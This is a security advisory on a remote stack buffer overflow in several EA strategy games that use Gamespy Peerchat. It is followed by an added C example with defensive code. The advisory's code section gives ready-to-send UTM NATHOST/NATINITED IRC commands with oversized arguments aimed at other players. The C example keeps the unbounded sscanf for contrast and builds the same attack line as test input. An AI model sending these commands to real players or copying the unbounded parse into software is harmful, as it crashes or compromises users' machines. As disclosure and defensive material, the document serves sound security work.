#######################################################################

                             Luigi Auriemma

Application:  Electronic Arts games that use the Gamespy network
              http://www.ea.com
              http://www.gamespy.com
Games:        Command & Conquer 3: Kane's Wrath <= 1.02
              Command & Conquer 3: Tiberium Wars <= 1.09
              Command & Conquer: Red Alert 3 <= 1.12
              Command & Conquer: Red Alert 3 – Uprising <= 1.00
              The Lord of the Rings: Battle for Middle-Earth <= 1.03
              The Lord of the Rings: Battle for Middle-Earth 2 <= 1.06
              The Lord of the Rings: BFME2: ROTWK <= 2.01
              ... possibly others ...
Platforms:    Windows (tested), other platforms supported
Bug:          buffer-overflow
Exploitation: remote, versus server and players
Date:         01 Jul 2010
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

Electronic Arts (EA) is a big games developer and publisher, and both
Command & Conquer (3 and RA3) and, to a lesser extent, the BFME series
are great examples.

#######################################################################

======
2) Bug
======

The Gamespy network uses a particular method to handle lobbies (chat
rooms) and servers. Initially there is no real difference between them,
because a server is launched just as a normal IRC chat room, so every
operation (new players joining, setting them ready, choosing colors or
teams and so on) is done over the Peerchat IRC server. This particular
"platform" also handles players behind NAT, to allow peer-to-peer games
like those covered by this advisory.

These EA games use some particular sub-commands of the UTM IRC command,
which are explained here:

  http://old.zenhax.com/red-alert-3-and-gamespy-peerchat-research-t501.html

NATHOST and NATINITED are two of these sub-commands and are also the
only ones that take a string as argument (the name of the user who sent
them). The target player parses that argument with sscanf using the
following format string:

  "%d %d %s"

The string read by the last conversion causes a stack-based buffer
overflow if it is longer than the roughly 200 bytes assigned to the
destination buffer, because the %s conversion has no field width.

The only thing the attacker must do to exploit this vulnerability
against the other players is join the room of the server on the
Peerchat server (it is publicly visible, being a room on an IRC server)
and send the UTM command from there to the target users in it.

From my tests only the C&C3, RA3, BFME and BFME2 games support these
particular sub-commands, so I guess no other vulnerable games exist.

#######################################################################

===========
3) The Code
===========

Join the Gamespy Peerchat server (peerchat_irc tool), join the channel
of the server created by the victim user (whois) and then send one of
the following IRC commands:

  /UTM USER :NAT NATHOST1 9999 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...aaa
  /UTM USER :NAT NATINITED1 9999 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...aaa

where USER is the nickname of the target user (admin of the server/room
or other players) and the last argument is a sequence of chars longer
than 200 chars.

Additional example:

  /WHOIS target_user          (or retrieve all the channels with LIST)
  /JOIN #GSP!redalert3pc!M01234567M   (chan/server of the user)
  /UTM target_user :NAT NATHOST1 1234 aaaaaaaaaaaaaaaaaaaaaaaaaaaaa...aaa

#######################################################################

======
4) Fix
======

No fix.

#######################################################################
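The parse described in section 2, as an added example written for this page (it is not code from the games, from Gamespy or from the advisory's author): the vulnerable "%d %d %s" pattern beside a bounded version of the same parse, plus a filter that flags UTM lines with the shape shown in section 3, which is the only defence available given the "No fix" in section 4. It assumes that the text following the NATHOST/NATINITED keyword (the "1 9999 aaaa..." part of the advisory's example) is what reaches sscanf and that the destination buffer is exactly 200 bytes (the advisory only says "about 200"); the function and constant names are mine.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Destination buffer size. The advisory says "about 200 bytes"; the exact
 * value is an assumption made for this example. */
#define NAT_NAME_BUF 200

/* The vulnerable pattern from section 2: no field width on %s, so a third
 * token longer than NAT_NAME_BUF-1 bytes runs past name[] on the stack.
 * Kept only for contrast; never feed it untrusted input. */
int nat_parse_vulnerable(const char *arg, int *a, int *b)
{
    char name[NAT_NAME_BUF];
    return sscanf(arg, "%d %d %s", a, b, name) == 3;
}

/* Bounded replacement: the %s gets a field width derived from the
 * destination size, and anything left after the three conversions means
 * the name was truncated (or carried trailing junk) and is rejected rather
 * than silently accepted. Returns 1 on success, 0 on failure. */
int nat_parse_bounded(const char *arg, int *a, int *b, char *name, size_t namesz)
{
    char fmt[40];
    int consumed = 0;

    if (namesz < 2)
        return 0;
    /* namesz == 200 yields "%d %d %199s%n": 199 chars plus the NUL */
    snprintf(fmt, sizeof fmt, "%%d %%d %%%zus%%n", namesz - 1);
    if (sscanf(arg, fmt, a, b, name, &consumed) != 3)
        return 0;
    for (const char *p = arg + consumed; *p != '\0'; p++)
        if (*p != ' ' && *p != '\t' && *p != '\r' && *p != '\n')
            return 0;
    return 1;
}

/* Filter for a raw line on the Peerchat connection, e.g.
 *   "UTM target_user :NAT NATHOST1 9999 aaaa...\r\n"
 * Returns 1 when it is a NATHOST/NATINITED UTM whose last argument would
 * not fit in a NAT_NAME_BUF-byte buffer, 0 for anything else. */
int utm_nat_is_oversized(const char *line)
{
    const char *p = strstr(line, ":NAT ");
    if (p == NULL)
        return 0;
    p += 5;
    if (strncmp(p, "NATHOST", 7) != 0 && strncmp(p, "NATINITED", 9) != 0)
        return 0;
    const char *last = strrchr(p, ' ');   /* last token is the name argument */
    if (last == NULL)
        return 0;
    last++;
    return strcspn(last, "\r\n") >= NAT_NAME_BUF;
}

/* Constructed test input: "1 9999 " followed by n 'a' characters, mirroring
 * the argument part of the advisory's example. Caller frees. */
char *make_nat_arg(size_t n)
{
    char *s = malloc(7 + n + 1);
    if (s == NULL)
        return NULL;
    memcpy(s, "1 9999 ", 7);
    memset(s + 7, 'a', n);
    s[7 + n] = '\0';
    return s;
}

/* Constructed attacker-style line in the shape of section 3:
 * "UTM <nick> :NAT <sub> 9999 <n x 'a'>\r\n". Caller frees. */
char *make_utm_line(const char *nick, const char *sub, size_t n)
{
    size_t len = 4 + strlen(nick) + 6 + strlen(sub) + 6 + n + 2;
    char *s = malloc(len + 1);
    if (s == NULL)
        return NULL;
    int off = snprintf(s, len + 1, "UTM %s :NAT %s 9999 ", nick, sub);
    memset(s + off, 'a', n);
    memcpy(s + off + n, "\r\n", 3);
    return s;
}

int main(void)
{
    int a, b;
    char name[NAT_NAME_BUF];
    char *arg = make_nat_arg(250);
    char *line = make_utm_line("target_user", "NATHOST1", 250);

    printf("bounded parse of a 250-char name: %s\n",
           nat_parse_bounded(arg, &a, &b, name, sizeof name) ? "accepted" : "rejected");
    printf("oversized UTM line flagged: %d\n", utm_nat_is_oversized(line));
    free(arg);
    free(line);
    return 0;
}
```

The bounded parser rejects rather than truncates because a silently shortened nickname is still attacker-controlled data reaching the rest of the NAT logic; the %n trick is what distinguishes "exactly 199 characters" from "199 characters and then more". The filter matches on the ":NAT " prefix and the sub-command keyword only, so it would need to be extended if the NAT sub-command names differ in other titles.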